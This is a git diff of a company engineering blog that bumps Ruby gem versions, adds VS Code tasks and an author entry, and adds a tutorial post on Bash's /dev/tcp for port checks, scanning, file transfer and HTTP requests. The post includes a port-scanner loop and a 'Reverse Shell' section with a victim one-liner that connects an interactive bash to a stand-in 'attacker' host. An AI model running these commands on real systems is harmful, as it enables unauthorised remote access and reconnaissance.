diff --git a/.vscode/tasks.json b/.vscode/tasks.json new file mode 100644 index 0000000..94c9502 --- /dev/null +++ b/.vscode/tasks.json @@ -0,0 +1,34 @@ +{ + "version": "2.0.0", + "tasks": [ + { + "command": "rvm install ruby-2.5.1; rvm use 2.5.1; gem install bundler:2.1.4; bundle update", + "type": "shell", + "label": "Jekyll - Install Dev Server", + "options": { + "shell": { + "args": [ + "--login" + ] + } + }, + "problemMatcher": [], + "group": { + "kind": "test", + "isDefault": true + } + }, + { + "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost", + "type": "shell", + "label": "Jekyll - Run Dev Server", + "options": { + "shell": { + "args": [ + "--login" + ] + } + } + } + ] + } \ No newline at end of file diff --git a/Gemfile.lock b/Gemfile.lock index 0fb4e89..b3cea7b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,10 +1,10 @@ GEM remote: https://rubygems.org/ specs: - addressable (2.8.1) + addressable (2.8.4) public_suffix (>= 2.0.2, < 6.0) colorator (1.1.0) - concurrent-ruby (1.1.10) + concurrent-ruby (1.2.2) em-websocket (0.5.3) eventmachine (>= 0.12.9) http_parser.rb (~> 0) @@ -12,7 +12,7 @@ GEM ffi (1.15.5) forwardable-extended (2.6.0) http_parser.rb (0.8.0) - i18n (1.12.0) + i18n (1.13.0) concurrent-ruby (~> 1.0) jekyll (4.0.1) addressable (~> 2.4) @@ -41,8 +41,8 @@ GEM rexml kramdown-parser-gfm (1.1.0) kramdown (~> 2.0) - liquid (4.0.3) - listen (3.7.1) + liquid (4.0.4) + listen (3.8.0) rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) @@ -64,9 +64,9 @@ GEM terminal-table (1.8.0) unicode-display_width (~> 1.1, >= 1.1.1) thread_safe (0.3.6) - tzinfo (1.2.10) + tzinfo (1.2.11) thread_safe (~> 0.1) - tzinfo-data (1.2022.7) + tzinfo-data (1.2023.3) tzinfo (>= 1.0.0) unicode-display_width (1.8.0) wdm (0.1.1) diff --git a/_data/authors.yml b/_data/authors.yml index a9baf54..f2f3321 100644 --- a/_data/authors.yml +++ b/_data/authors.yml @@ -19,3 +19,6 @@ tim_fraczak: david_suh: name: David Suh title: Software Engineer - Enterprise +stefanos_kalandaridis: + name: Stefanos Kalandaridis + title: Site Reliability Engineer diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md new file mode 100644 index 0000000..b131c72 --- /dev/null +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -0,0 +1,104 @@ +--- +layout: post +title: Bash-ing your network with /dev/tcp +excerpt: "In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +/dev/udp is also valid." +author: stefanos_kalandaridis +categories: +- troubleshooting +- networking +- security +tags: +- bash +- networking +- http +- security +--- +## /dev/tcp is a file descriptor of bash shell + +In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +/dev/udp is also valid. + +- [Port Scanning](#port-scanning) +- [Read TCP stream](#read-tcp-stream) +- [File Transfer](#file-transfer) +- [Reverse Shell](#reverse-shell) +- [HTTP Requests](#http-requests) + +### Port scanning +#### One of the most common uses of it is to check if a port is open in a remote host +``` +timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && echo "open" || echo "closed" +``` + +#### This can be extremely usefull in cases where a machine/container doesn't have nc, curl, wget or any other utility to check for network connection +Let's say we are in a kubernetes pod that runs on a minimal image having bash. We want to check if it can communicate with a service or if the service is actually listening on a port. +``` +kubectl exec -it svc/random-service -- bash +$ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed" +``` + +#### You can make a port scanner with it (and it's pretty fast) +``` +for port in {1..8888}; do + echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open" +done +``` + +### Read TCP stream +#### Get the time from nist.gov +``` +cat < /dev/tcp/time.nist.gov/13 +``` + +### File Transfer +#### Option 1 +Sender +``` +nc -lvnp 7777 < file.txt +``` +Receiver +``` +cat < /dev/tcp/sender/7777 > file.txt +``` + +#### Option 2 + +Receiver +``` +nc -lvnp 7777 > file.txt +``` +Sender +``` +cat file.txt > /dev/tcp/receiver/7777 +``` + +### Reverse Shell +#### Attacker +``` +nc -lvnp 7777 +``` +#### Victim +``` +bash -c 'bash -i >& /dev/tcp/attacker/7777 0>&1' +``` + +### HTTP Requests +#### Fetching the `www.google.com` page +``` +exec 5<>/dev/tcp/www.google.com/80 +echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&5 +cat <&5 +``` + + + +### References +- [https://tldp.org/LDP/abs/html/devref1.html](https://tldp.org/LDP/abs/html/devref1.html) +- [https://w0lfram1te.com/exploring-dev-tcp](https://w0lfram1te.com/exploring-dev-tcp) \ No newline at end of file